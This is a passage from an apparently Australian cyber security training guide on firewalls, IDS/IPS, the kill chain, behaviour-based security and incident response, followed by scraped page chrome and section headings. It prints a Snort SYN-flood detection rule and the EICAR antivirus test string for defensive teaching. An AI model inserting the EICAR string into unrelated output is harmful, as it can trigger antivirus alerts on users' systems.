Permission Description
Full control View file or folder contents, change existing files

and folders, create new files and folders, and run
programs in a folder.
Modify Change existing files and folders but cannot

create new ones.
Read and execute View the contents of existing files and folders
and can run programs in a folder.
Read View the contents of a folder as well as open

files and folders.
Write Create new files and folders and make changes

to existing files and folders.
512277200.docx
Figure 3 – Windows NTFS permissions
Activity – File permissions
Apply and test NTFS permissions and Linux Permissions
5.1 Common equipment used to protect an organisation from cyber security attacks is identified
Equipment used to protect an organisation from cyber security attacks

Hardware used to protect from cyber-attacks include firewalls, intrusion detection/prevention
systems, Unified Threat Management systems, routers, and switches.
Firewall
The purpose of a firewall is to filter inbound and outbound network traffic. A firewall matches packet
headers against permit and deny, relevant to source/destination ports and IP addresses. A firewall is
an in-band device meaning that network traffic must pass through it. A firewall is often the first
device encountered at the perimeter of a network. A firewall may be dedicated to the function of
firewalling or included along with other functionality in a PC, router, switch, modem or Wireless
Access Point (WAP).
512277200.docx
Packet filtering
A packet filtering firewall performs deny/allow packet filtering on static values such as IP addresses
and port numbers but has no regard to a packets connection state. A packet filtering firewall may
also be described as a stateless firewall
Stateful
A stateful firewall keeps track of incoming and outgoing traffic to only allow traffic with an existing
connection. Whilst this is a more secure process, traffic tracking uses more resources resulting in
slower processing and opens the firewall to a specific insecurity where its resources can become
depleted causing cessation of function. Stateful firewalls are also more expensive than stateless
firewalls.
Circuit level
A circuit-level firewall allows connections based on valid session criteria such as time of day and TCP
handshake status. It acts as a proxy and so it provides the advantage of hiding internal resources. It
is also inexpensive. However, it does not perform packet filtering and so once a connection has been
established malicious packets could enter through the connection. Because of this, a circuit-level
firewall is often used in conjunction with a packet filtering firewall to form a dynamic (hybrid)
firewall. This however increases complexity of implementation and maintenance and adds to the
financial cost.
Application level
An application-level firewall performs deep packet inspection by looking at the application program
format in the payload and acts as a proxy. Although this is more secure than simple packet filtering,
it does incur significant resource usage, and this makes it slower than a packet filter firewall.
Application-level firewalls consist of complete operating systems and so they are vulnerable to bugs
and problems affecting OS components.
Next Generation
The jury is out on exactly what a ‘Next Generation’ firewall is as it is used in marketing hype.
However, some characteristics of a NG firewall might include IPS ability and deep-packet inspection.
Intrusion Detection system

An Intrusion detection system (IDS) i monitors inbound and outbound network traffic checking for
abnormal activity (Heuristic IDS) or for a known pattern or signature of data bits (signature IDS) that
is malicious or against the network policy.
A Heuristic IDS maybe able to detect a previously unheard-of attack by checking for unusual activity,
whilst a signature-based IDS detect threats that match known signatures in its database. When an
anomaly or relevant signature is detected the IDS can report the activity to an administrator via
email/SMS, keep a log file to be checked at a later time, and send messages to devices such as
firewalls to take action.
512277200.docx
Figure 4 - IDS
An IDS can be network based, or host based. A host-based IDS is applied to a specific host rather
than to an entire network or section of a network. Common software used for detecting threats
include Snort, Suricata, Bro and SolarWinds.
Intrusion Prevention System (IPS)

Due to improvements in technology an IDS is usually part of an IPS nowadays. An IPS ‘intercepts/
filters’ unwanted traffic whether that be malicious or simply against network policy. An IPS is
different from an IDS in that it filters as well as monitors. Originally an IDS had to be a “monitor only
device” because they were too slow to filter traffic. When technology advances made IDS’s fast
enough to be placed in line with the traffic and filter it, they could start to be called IPSs.
Figure 5 - IPS
IPS, IDS & Firewall differences

There are distinct differences between a firewall, IDS and IPS as follows.
A firewall checks header only and not the payload of a packet. It matches rules against protocol type,
source address, destination address, source port, and/or destination port.
An IDS detects anomalies or signatures of a packet’s header and payload. The rules are more
complicated than simple port or address matching and involves factors such as timing and
throughput. An IDS does not drop packets but only relays or logs information for further action by a
device or administrator.
512277200.docx
An IPS performs the complex detection of an IDS but also can drop packets and shut systems or
network segments down. The difference between an IDS and IPS can be as simples as changing a
devices options form log only to log and drop.
Unified Threat Management System (UTM)

When the features of a firewall, IPS and IDS are combined, and then further combined with features
such as anti-virus, anti-spam and content filtering, it is referred to as a Unified Threat Management
system. Although the industry is incorporating more UTMs they are not a complete solution as are a
single point of failure, may have performance issues and are costly.
Router
Aside from the ability to route network traffic, routers often have features that enhance a networks
security such as firewalls, content filtering and Access Control Lists. ACLs are filters that allow or
deny packets based on destination and source IP addresses, ports, and protocols. ACLs however do
not examine a packets’ content or state as firewalls may do.
Switch
A switch may also have ACLs and in addition may allow port security and Virtual Local Area
Networks. Port security involves assignment MAC addresses such that only a device with a specific
MAC address is allowed access to a specific port. So, if another device is plugged in to that switch
port, the device is denied access. After this occurrence, the switch port may stay disabled until reset
by an administrator.
VLANs are separate networks that can be configured on a switch. For example, the first 12 ports on a
switch can be configured for one network, whilst the other 12 ports are configured for a different
network. This network segmentation keeps the devices from communicating with each other and so
critical devices can be placed on different networks to prevent local as well as remote access
5.2 Terms such as botnets, the cyber kill chain process and behavior based security in the context of
cyber security protection methodologies are explained.
Cyber kill chain

The Kill Chain is a military term that has been applied to cyber security and refers to the structure of
an attack from reconnaissance through to action. The seven steps in the chain are as follows.
 Reconnaissance – e.g. collecting information such as email addresses and IP addresses

 Weaponization – e.g. prepare an exploit along with a backdoor
 Delivery – e.g. deliver the exploit via email or Internet
 Exploitation – e.g. exploit a vulnerability such as open a command shell on the target
 Installation – e.g. Install malicious software such as a keylogger on the target
 Command and Control – e.g. keep the communication channel open
 Actions on Objectives – e.g. delete data
The entire chain cannot be applied to all attack types as not all attacks attempt to install malware
and maintain communications. However, by knowing that a break anywhere in the chain prevents an
attack, the kill chain models enables defenders to target their defences at one or more points of the
chain.
Activity – Visit Lockheed Martin then download and read “Apply cyber kill chain
methodology”: 512277200.docx
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
Botnet
A Botnet is an abbreviated term for ‘Robot Network’. A botnet is a network of automated devices
that carry out attacks. For example, hundreds of thousands of individual home routers and IP
cameras were controlled and used in a Distributed Denial of Service attack to take down ‘Dyn’. Dyn is
a DNS service provider to companies such as Netflix. The result was Denial of service to Netflix and
other major companies.
Behaviour based security (or heuristics)

Behaviour based security refers to an approach that attempts to assess the risk that a human
activity, or computer activity, is malicious based on characteristics and patterns, that is to say based
on anomalies and the way that it acts, rather than being based on exact signatures. Anti-virus
programs and Intrusion Protection Systems use signature-based security but they also use behaviour
based security. For example, the text below is used by the Snort IDS system to detect SYN flood
attacks. It causes an alert if the number of SYN packets aimed at port 80 is greater than 1000 in a 60
second period.
alert tcp any any -> 192.168.56.102 80 any (msg:"TCP SYN flood attack detected"; flags:S;
threshold: type threshold, track by_dst, count 1000, seconds 60; sid: 5000001; rev:1;)
Examples of human based behaviour security include comparing login dates, login times, data
bandwidth usage and programs accessed. If a human’s pattern deviates from the usual, for example
logging in at 1am, the event is flagged as a potential security issue.
Anti-virus programs also use heuristic analysis to detect ‘unknown’ viruses by looking for suspicious
properties. Two heuristic methods are static analysis and dynamic analysis.
 Static analysis – a suspect programs source code is examined and compared with an existing
database if a certain percentage of the code matches, then it is flagged as an issue. Code
similarities like this may show a file to be a family variant of a known virus. Static analysis
also includes inspecting a file to determine its purpose and destination which might provide
evidence of malicious intent.
 Dynamic analysis – Suspect programs can execute in a virtual environment. As the program
executes suspicious behaviour is looked for such as self-replication and overwriting files.
All major anti-virus software provides signature based as well as heuristic analysis. A downside
to heuristic analysis is that it may throw up false positives. A file may be flagged as being
malicious when in fact it is benign. Heuristic analysis may also throw up false negatives and thus
not let viruses through.
In contrast to anomaly detection the following text is an example of a signature used by an anti-virus
program.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
The signature is known as ‘eicar’ and is designed as a test signature for anti-virus programs.
https://www.eicar.org/?page_id=3950
512277200.docx
5.3 Methods for protecting an organisation from cyber-attacks are developed and evaluated
Methods for protecting an organisation from cyber-attack

There are many tools and processes that can be used to protect against cyber-attack. Organisations
such as the Australian Signals Directorate, Business.gov.au and Scam watch list various strategies.
Activity – Visit cyber.gov.au and review the 37 strategies for five specific areas of attack.
Review the supporting documents also.
Activity – Visit Scam Watch and review their technique for avoiding scams.
https://www.cyber.gov.au/publications/strategies-to-mitigate-cyber-security-incidents
https://www.scamwatch.gov.au/get-help/protect-yourself-from-scams
https://www.cyber.gov.au/publications/strategies-to-mitigate-cyber-security-incidents-
mitigation-details
https://www.cyber.gov.au/ism
Activity – Visit Business.gov.au and review their techniques for keeping your business
safe
https://www.business.gov.au/risk-management/cyber-security/keep-your-business-
safe-from-cyber-threats
Cyber security standards bodies

A standards body is an organisation dedicated to developing standards for users operating within
various areas such as automotive, building, telecommunications and cyber security. There are
various bodies dedicated to the development of standards. Examples of bodies include the National
Institute of Standards and Technology (NIST), The British standards Institution (BSI), the Internet
Engineering Task Force (IETF), the Payment Card Industry Security Standards Council (PCI SSC), the
International Organization for Standardization (ISO), and Standards Australia. Standards Australia is
the Australian representative of the ISO.
Activity – Visit Standards Australia and search for “information security” related
products. Make a list of all relevant products.
https://www.standards.org.au/
Enterprise Security frameworks

Standards bodies and others produce security frameworks. A security framework is a defined set of
policies and procedures for the management of information security. By adhering to a security
512277200.docx
framework an enterprise can be better protected than otherwise. Framework types can be classified
as control frameworks, program frameworks or risk frameworks. Example frameworks include ISO
27000, COBIT, NIST 800-53 and NIST 800-171
Activity – Visit Tech Republic and review framework types
https://www.techrepublic.com/article/how-to-choose-the-right-cybersecurity-
framework/
Activity – Visit Tech Target and review security frameworks
https://searchsecurity.techtarget.com/tip/IT-security-frameworks-and-standards-
Choosing-the-right-one
Create a matrix showing, for each framework:
 Who developed or auspices the framework?

 How long it has been in use?
 What are the key topics it covers?
 Who are the main users of the framework?
 What is unique or noteworthy about the framework?
5.4 Introduction to behavior-based approach to cyber security is presented
Behaviour based approach to cyber security (Behavioural analytics)

A behaviour-based approach to cyber security refers to analysing the previous behaviours of a user
account and comparing them to current behaviours as a method of detecting security breaches. The
pattern of use established over time by a computer account is somewhat unique. Examples of
behaviours include the following.
 Login days/times
 applications used
 websites visited
 types of data accessed
 amount of data transferred
 speed of typing
 geographic location
 deviations from a peer group’s activities
512277200.docx
If a users’ account varies from known patterns a detection system can notice this and block or
Activity – Visit IBM to view a video about Q Radar, a behavioural analytics program
https://www.ibm.com/us-en/marketplace/qradar-user-behavior-analytics
provide an alert about such deviations. Such deviations from the norm may mean a user is doing
something malicious either intentionally or accidentally, or that a users’ account has been
compromised and is in use by a hacker.
5.5 Incident response standards are defined
Incident Response Standards

A computer security incident as defined by the National Institute of Standards and Technology is
“… a violation or imminent threat of violation of computer security policies, acceptable use policies,
or standard security practices” - https://csrc.nist.gov/glossary/term/incident (accessed 29 May
2020).
Examples of incidents are:
 An attacker commands a botnet to send high volumes of connection requests to a web

server, causing it to crash.
 Users are tricked into opening an email attachment titled “quarterly report” which
contained malware; running the tool has infected their computers and established
connections with an external host. (Cichonski et al, 2012 2)
There are various standards developed for responding to incidents including:
 Computer Security Incident Handling Guide (NIST)

 ISO 27035-1:2016 Part 1: Principle of incident management
 Prepare for cyber incident (vic.gov.au)
The basic steps involved within all these standards are as follows.
1. Detection and Analysis

2. Containment and Eradication
3. Communications and Engagement
4. Recover
5. Learn and Improve
Activity – Visit NIST and review SP800 Computer Security Incident Handling guide.
Internet search: NIST.SP.800-61r2.pdf
2
Cichonski, P., Millar T., Grance, T., and Scarfone, K. 2012 “Computer Security Incident Handling Guide V2.
NIST
512277200.docx
Activity – Visit vic.gov.au and review the Cyber Incident Template.
https://www.vic.gov.au/prepare-cyber-incident
Other organisations, such as the SANS institute (SysAdmin, Audit, Network and Security), may vary
the names and groupings of the steps given above, but essentially the procedure is the same.
Activity – Visit SANS Institute and review the Incident Handler’s Handbook.
https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-
handbook-33901
Activity – Visit Alien Vault (Now ATT Cyber Security) and review the difference between
NIST and SANS
https://www.alienvault.com/blogs/security-essentials/incident-response-steps-
comparison-guide
Revisions
030919 (V7)
Added Cyber security standards bodies and Enterprise Security Frameworks at 5.3
060919 (V8)
Added activities to 4.4 Protecting personal privacy
290520 (V9)
Added password cracking activity
Replaced deadlines
290531 (V9.1)
Added Installing & Configuring Active Directory
Replaced reference to Installing kapersky to Installing Comodo due to Kapersky controversy
(https://en.wikipedia.org/wiki/Kaspersky_bans_and_allegations_of_Russian_government_ties)
512277200.docx

Learning Guide VU21990 Recognise The Need For Cyber Security in An Organisation v9.1

Uploaded by

Copyright:

Available Formats

Learning Guide VU21990 Recognise The Need For Cyber Security in An Organisation v9.1

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Learning Guide VU21990 Recognise The Need For Cyber Security in An Organisation v9.1

Uploaded by

Copyright:

Available Formats

What are the main threat sources discussed in the document?

What are the main threat sources discussed in the document?

What are the main reasons an organization should protect its data?

What are the main reasons an organization should protect its data?

Security basics

VU21990 Recognise the need for cyber security in an organisation

1.2 Threat sources for an organisation are identified

A threat source is at the root of adverse effects

Threat Initiates Threat Exploits Causing Adverse

Figure 1 - Chain of events causing adverse impacts

Figure 2 - Macro recording in MS Word

Application threat source example

Other application threat sources

Other threat sources

Data, networks, machines, users and applications

1.4 Introduction to identity and access management (IAM) is clarified

The benefits of IAM include the following:

Activity – Review information about IAM systems and technology to better

Activity – define IAM in two sentences.

Some further examples to help defining IAM are given below:

Active Directory (AD)

Activity – View the following video: https://www.youtube.com/watch?v=OTpbQkW3kj4

Installing Active Directory

Activity – view the video: https://www.youtube.com/watch?v=dXdQwDA4II0 (16:00)

Securing the physical infrastructure

Securing the physical infrastructure involves the following

 Securing the premise

Securing the premise Securing equipment Secure behaviour

Keep confidential areas Secure disposal of equipment Access protocols or policies

Vetted security guards and Ongoing auditing of access log

Site design and layout Threat profiles*

Visit abc.net.au and review Specsavers theft

Visit acfe and review Coca-cola data breach case

Visit infosecurity-magazine and review USB breach

Activity – Learn about browser fingerprinting.

Visit abc.net.au and review stolen identity cases

How are identities stolen

 A user maybe deceived into revealing personal information

Activity – Learn about browser fingerprinting.

1. Visit https://pixelprivacy.com/resources/browser-fingerprinting/ Briefly describe

Protecting personal privacy

Activity – Learn about password hygiene.

Visit WindowsReport and review browser privacy plugins

Visit makeuseof and review the benefits/detriments of regularly changing passwords

Visit telesign note the various services that offer 2FA

Visit phishingquiz and test your ability to detect phising emails

2.2 Reasons to protect an organisation’s data are explained

Reasons to protect an organisation’s data

2.3 Concept of cyber threat is defined

What is a cyber threat?

 Advanced Persistent Threats (remain resident but undetected)

Trojans, worms, and viruses

Distributed Denial of Service

Activity – Visit scamwatch and register for scam alerts

3.1 Security vulnerabilities and malware are identified and demonstrated

Security vulnerabilities and malware

Common vulnerabilities include the following:

 Missing data encryption

Activity – Visit OWASP and define the following vulnerabilities – OS command